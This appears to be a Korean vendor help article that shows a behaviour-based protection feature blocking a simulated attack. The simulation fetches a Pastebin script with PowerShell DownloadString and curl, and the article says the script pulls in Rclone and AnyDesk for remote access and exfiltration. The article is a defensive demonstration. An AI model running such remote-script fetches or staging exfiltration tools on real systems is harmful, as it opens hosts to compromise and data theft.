동적 예방이 네트워크를 어떻게 보호하는지 시연

개요

동적 예방은 행동 기반 보안 엔진으로, 탐지된 위협에 대응하여 공격 표면을 줄이고, 영향이 발생하기 전 초기 단계에서 위협을 완화하도록 동적 제어를 선제적으로 적용합니다. 자세한 내용은 무엇이 동적 예방인가?을 참조하십시오.

이 문서는 동적 예방이 어떻게 네트워크를 보호하는지를 시연하기 위해 현실 세계의 공격 시나리오를 모의 실습합니다. 이 예에서는 사용자가 Pastebin에서 스크립트를 다운로드하고 공격자가 미래의 공격을 수행하기 위해 추가적인 고위험 도구를 가져오려는 시도를 합니다. 동적 예방은 악성 행동을 식별하고 도구가 다운로드되지 못하도록 차단함으로써 공격이 진행되거나 영향을 미치기 전에 막습니다.

이 공격에 대한 대응은 완전히 자동화되어 있습니다. 추가 규칙이 필요하지 않습니다. 단순히 동적 예방을 활성화하는 것으로 공격을 방지할 수 있습니다.

이 공격을 시뮬레이션 하려면:

  1. 차단되지 않고 고위험 도구를 다운로드합니다.
  2. Pastebin에서 스크립트를 다운로드합니다.
  3. 고위험 도구를 다시 다운로드하려고 시도합니다. 이번에는 다운로드가 차단됩니다.

단계 조건

  • 동적 예방이 활성화되고 작업이 차단으로 설정됩니다.

단계 1: 고위험 도구 다운로드

동적 예방이 악성 시퀀스의 일부일 때만 작업을 차단한다는 것을 증명하기 위해, 먼저 Rclone을 다운로드합니다. 이는 파일 관리를 위한 오픈 소스 커맨드라인 도구입니다. 공격자는 합법적이고 강력하며 일반적인 관리 활동과 섞이기 때문에 보통 Rclone을 사후 피해 도구로 사용합니다.

작업

Rclone을 다음 중 하나에서 다운로드합니다:

  • 다음 URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Windows 장치에서:

    • 다음 PowerShell 명령: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • macOS/Linux 장치에서:

    • 다음 터미널 명령: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

결과

파일이 성공적으로 다운로드됩니다.

설명

이것은 격리된 상태에서는 작업이 차단되지 않으며, 의심스러운 활동이 선행되지 않으면 악성으로 간주되지 않음을 확인합니다.

단계 2: Pastebin에서 스크립트 다운로드

공격이 시작되는 것을 시뮬레이션하려면 Pastebin에서 스크립트를 다운로드하세요. 이 스크립트를 실행하면 일반적인 공격자 도구인 Rclone과 AnyDesk를 다운로드해 원격 액세스 및 유출을 수행하십시오.

작업

Pastebin에서 스크립트를 다운로드하고 실행합니다:

  • Windows 장치에서:

    • 다음 PowerShell 명령: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
  • macOS/Linux 장치에서:

    • 다음 터미널 명령: curl -sSL "https://pastebin.com/raw/tXhVK2V7"

결과

스크립트가 실행되고 도구가 다운로드됩니다. 호스트에 동적 제어가 적용되며, 이는 보안 위협 대시보드제어가 있는 호스트 위젯에 표시됩니다. 자세한 내용은 보안 위협 대시보드 사용을 참조하십시오.

Dynamic_Prevention1.png

설명

동적 예방은 의심스러운 행동의 지표를 감지하고 후속 악성 작업을 차단하기 위해 제어를 선제적으로 강화하며, 모든 영향이 발생하기 전에 공격을 멈춥니다.

단계 3: 고위험 도구 다운로드

모의 공격에서 공격자는 Rclone을 다운로드하려고 시도합니다. 그러나 Pastebin에서 스크립트를 다운로드하는 활동을 의심스러운 활동으로 판단하고 제어가 적용되었기 때문에 동적 예방은 Rclone 다운로드를 차단합니다.

작업

Rclone을 다음 중 하나에서 다운로드합니다:

  • 다음 URL: https://downloads.rclone.org/rclone-current-windows-amd64.zip
  • Windows 장치에서:

    • 다음 PowerShell 명령: Open-InBrowser -Url "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -Label "RClone"
  • macOS/Linux 장치에서:

    • 다음 터미널 명령: curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

결과

이 파일의 다운로드는 제어에 의해 차단됩니다. 완화된 위협은 보안 위협 대시보드완화된 위협이 있는 호스트 위젯에 표시됩니다.

DP5.png

설명

1단계에서는 이 스크립트가 격리되어 실행되어 허용되었지만, 이번에는 의심스러운 작업에 의해 선행되었기 때문에 동적 예방에 의해 차단됩니다.

시연

이 비디오는 이 모의 공격의 시연을 보여준다.

도움이 되었습니까?

0명 중 0명이 도움이 되었다고 했습니다.

댓글 0개